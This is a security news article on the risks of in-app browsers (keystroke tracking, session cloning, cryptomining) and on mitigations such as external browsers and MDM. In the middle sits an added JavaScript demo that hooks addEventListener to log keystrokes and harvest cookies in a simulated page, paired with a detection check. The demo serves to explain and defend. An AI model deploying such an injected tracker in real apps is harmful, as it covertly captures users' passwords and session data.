In-app browser security risks and what to do about them
Meta and TikTok were quick to declare their activities to be benign, but their historical behavior, coupled with the potential for other apps or malicious actors to abuse or exploit this ability, is concerning, especially when in-app browsing is performed on work devices that connect to corporate networks and store business information. Security teams should therefore be aware of the threats that in-app browsers can pose to an organization and take steps to help address the risks.
What are in-app browsers?
In-app browsers are used by apps when a user clicks a link to a regular web page from inside the app, DNSFilter senior security researcher Peter Lowe tells CSO. “Instead of opening the page in the mobile device’s default browser like Safari or Chrome, it opens in an embedded version that runs inside the app itself,” he adds. Since the browser doesn’t run externally, this gives the app more control over the browser.
What security risks do in-app browsers pose?
It’s this increased control that can introduce the kinds of code injection and data tracking issues that Felix Krause has highlighted, Lowe says. “What has been shown is that some very popular apps – including TikTok and Instagram – seem to be using it to track users, to the point where individual keystrokes are monitored and the tracking code is added to each page. This bypasses the app store policies put in place to prevent this sort of thing, but due to the way apps and policies are designed, it currently exists as a loophole.”
When it comes to the security risks associated with in-app browsers, one of the most crucial aspects a business needs to consider is how it handles sensitive data and privacy, Jens Monrad, director and head of Mandiant Intelligence EMEA, tells CSO. “We use our phones for everything, including business. This means there are many opportunities for critical information to be compromised or leaked – intentionally or unintentionally.”
Another risk companies need to consider is that app users almost never have the time or patience to read the entire user rights and consent agreement, which can typically run to more than 30 pages, says Monrad. “While much of the data collection that occurs is benign, users may end up consenting to things they are unaware of, such as tracking their credentials or location.”
Once collected, such information is golden in the hands of cybercriminals, as it allows them to clone a web session with all of its settings, such as browser version (the user-agent string), locally available languages, cookies and other user-specific information, adds Dmitry Bestuzhev, most distinguished threat researcher at BlackBerry. “This way, cybercriminals can bypass the anti-fraud systems run by financial organizations to identify their recurring customers. It is the effect of a wolf in sheep’s clothing.”
Besides collecting credentials, in-app browsers can also be exploited for cryptocurrency mining, Bestuzhev says. “It’s especially painful when the browser is closed but running in the background. Most modern browsers include this feature, so mining cryptocurrency through the browser can work even when the browser is apparently closed.”
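To make the two risks above concrete, here is an added example (not code from the article, and not code from Meta, TikTok or any app it names). It shows the shape of a tracking script a host app can evaluate in every page its in-app browser loads, recording keystrokes and the session fingerprint Bestuzhev describes (user-agent, languages, cookies), and a best-effort check a web page can run to notice that its environment has been tampered with. It runs under Node.js 15 or later; `makePage()` is a constructed stand-in for the browser’s `window`/`document`, and the cookie and user-agent values in it are made up.

```javascript
"use strict";
// Added example: a host-injected in-app-browser tracker and a page-side check
// for it. Not from the article or any real app. Runs in Node.js >= 15, which
// provides EventTarget and Event; makePage() stands in for window/document.

// Node's Event has no `key`, so give the demo a KeyboardEvent-like class.
class KeyEvent extends Event {
  constructor(key) { super("keydown"); this.key = key; }
}

// Constructed page environment (all values made up for the demo).
function makePage() {
  return {
    navigator: {
      userAgent: "Mozilla/5.0 (iPhone; CPU iPhone OS 15_6 like Mac OS X)",
      languages: ["en-US", "en"],
    },
    document: {
      cookie: "sessionid=abc123; csrftoken=xyz",
      scripts: [{ src: "https://example.com/app.js" }], // what the page itself ships
    },
    passwordField: new EventTarget(), // stands in for <input type="password">
    collected: [],                    // constructed sink for whatever the tracker harvests
  };
}

// (a) The injected tracker. The host app evaluates this in the WebView after
// every page load: it fingerprints the session, then replaces addEventListener
// so that any keydown handler the page installs is shadowed by one that records
// the key before handing it on. The page's own code sees nothing different.
function injectTracker(page) {
  page.collected.push({
    userAgent: page.navigator.userAgent,
    languages: page.navigator.languages,
    cookies: page.document.cookie,
  });
  const originalAdd = EventTarget.prototype.addEventListener;
  EventTarget.prototype.addEventListener = function (type, listener, options) {
    const hooked = type !== "keydown" ? listener : (ev) => {
      page.collected.push({ key: ev.key });
      return listener.call(this, ev);
    };
    return originalAdd.call(this, type, hooked, options);
  };
  // Code evaluated directly by the host leaves no <script> element behind (and
  // is not governed by the page's Content-Security-Policy); this tracker adds
  // one anyway so the second heuristic below has something to find.
  page.document.scripts.push({ src: "", text: "/* injected by host */" });
  return () => { EventTarget.prototype.addEventListener = originalAdd; };
}

// (b) Best-effort detection from inside the page, two heuristics:
//  1. Compare built-in functions against references captured when the page's
//     own script first ran. Limitation: a host that injects at document-start
//     runs before that snapshot and is not caught.
//  2. Flag any <script> element that is not on the page's own allowlist.
// Both are advisory: the host owns the WebView and can defeat either check.
function snapshotBuiltins() {
  return new Map([
    ["EventTarget.prototype.addEventListener", EventTarget.prototype.addEventListener],
    ["EventTarget.prototype.dispatchEvent", EventTarget.prototype.dispatchEvent],
  ]);
}

function detectInjection(page, snapshot, allowedScripts) {
  const findings = [];
  const current = snapshotBuiltins();
  for (const [name, fn] of snapshot) {
    if (current.get(name) !== fn) findings.push(`${name} has been replaced`);
  }
  for (const s of page.document.scripts) {
    if (!allowedScripts.includes(s.src)) findings.push(`unexpected script: ${s.src || "<inline>"}`);
  }
  return findings;
}

// Demo: a clean page passes; after injection, a user typing a password into the
// page's own field leaks every keystroke and the session fingerprint to the
// tracker's sink, and the check reports both heuristics.
function runDemo() {
  const page = makePage();
  const allowed = ["https://example.com/app.js"];
  const snapshot = snapshotBuiltins();
  const before = detectInjection(page, snapshot, allowed);
  const restore = injectTracker(page);
  const typed = [];
  page.passwordField.addEventListener("keydown", (ev) => typed.push(ev.key));
  for (const k of "hunter2") page.passwordField.dispatchEvent(new KeyEvent(k));
  const after = detectInjection(page, snapshot, allowed);
  restore();
  return {
    before,
    after,
    typedByUser: typed.join(""),
    leakedKeys: page.collected.filter((r) => r.key).map((r) => r.key).join(""),
    leakedCookies: page.collected[0].cookies,
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(runDemo(), null, 2));
}
```

Run it with `node inapp-tracker-demo.js`. The point of the snapshot check is that the page can only compare against what it saw when its own code started; a host that injects before the first byte of page script runs (as platform APIs allow) leaves the page with no pristine reference at all, which is why the article’s mitigations focus on getting out of the in-app browser rather than detecting it from within.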
How to mitigate in-app browser security risks
Mitigating the threats posed by in-app browsers isn’t always straightforward, but businesses can take steps to reduce the risk. “It is possible to configure an application to properly launch an external browser for link clicks rather than displaying the page inside the application, and even if the application itself has not been configured that way, a user can click ‘open in Safari’ (or whatever browser they’re using) while viewing the page, to launch it in an external browser instead,” says Lowe. He recommends configuring apps to open links in an external browser when possible and notifying users that this is happening, so that they are more aware of their activities when browsing a page from within an app.
More cautious organizations may opt to completely prevent access to certain applications on corporate devices using mobile device management (MDM) solutions, Monrad says. “This allows companies to enforce certain restrictions on the device while ensuring the integrity of the device. Organizations can effectively create a secure container in the phone where business operations can take place and where access to certain apps and software updates can be more tightly controlled.”
For Bestuzhev, the first thing to do is to set policies allowing or denying approved and unapproved browsers for use. “It can be achieved via black/white list, default deny technologies and AD [Active Directory] policies deployed on the endpoint,” he adds. “If the network is based on Microsoft technologies, there is a granular policy to deploy from AD to the endpoints for Edge. Edge is a modern Chromium-based browser, which can be configured to refuse in-app plugins. It’s also important to have a good endpoint protection product, so if there is an attempt to circumvent it, your endpoint product may block it based on in-app program code analysis.”
Newer versions of iOS and Android offer granular security controls that allow end users to make choices about apps’ access to the clipboard, sharing of precise location data and so on, says Monrad. “Additionally, users can also be notified of apps trying to use cameras or audio. While this doesn’t fully mitigate the risk, I think it’s a step in the right direction that companies may also consider as part of their guidelines for employees and mobile devices.”
On that note, user education and in-app browser risk awareness are also important, Lowe says. “Fortunately, general awareness has been raised at this point, so we can expect some changes to the mechanics behind embedded browsers in the future. Work is certainly underway to prevent app developers from abusing this feature and we can expect concrete fixes at some point.”
Copyright © 2022 IDG Communications, Inc.